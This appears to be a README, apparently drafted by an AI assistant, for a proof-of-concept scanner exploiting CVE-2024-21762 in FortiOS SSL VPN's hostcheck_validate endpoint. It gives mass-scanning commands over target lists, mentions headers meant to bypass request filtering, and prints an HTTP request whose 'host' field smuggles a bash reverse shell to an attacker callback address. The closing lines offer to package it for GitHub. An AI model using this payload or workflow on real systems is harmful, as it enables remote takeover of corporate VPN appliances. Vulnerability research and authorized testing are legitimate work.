
Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery.
Proof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s /remote/hostcheck_validate endpoint with reverse shell payload delivery.
Here’s a GitHub-style writeup for your project, including a clean and concise summary, a usage guide, and context on how it fits with the CVE.
CVE-2024-21762 FortiOS HostCheck PoC ScannerProof-of-concept scanner targeting CVE-2024-21762 in FortiOS SSL VPN’s
/remote/hostcheck_validateendpoint with reverse shell payload delivery.
This Python script is a PoC (Proof of Concept) tool designed to interact with Fortinet’s FortiOS SSL VPN interface, targeting CVE-2024-21762 — a stack-based buffer overflow or command injection vulnerability in the /remote/hostcheck_validate endpoint.
Disclaimer: This is for educational and authorized testing purposes only.
/remote/hostcheck_validate on a FortiGate SSL VPN interface.host).User-Agent, Cookie) to bypass superficial FortiOS request filtering.last_response.txt)tqdm for progress visualizationInstall dependencies:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: List of targets in IP:PORT format, one per lineresults.txt: Output log of exploit attemptsPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
The tool writes the full HTTP response of each attempt to:
last_response.txt
Use this to verify if the request was parsed, rejected, or if an error code was returned.
This code is provided for educational and authorized testing purposes only. Do not use this on networks or systems you do not own or have explicit permission to test.
Carter — Cybersecurity Engineer, Red/Purple Team enthusiast, PoC automation nerd.
Would you like this packaged into a README.md file + repo structure ready to push to GitHub? I can generate that next.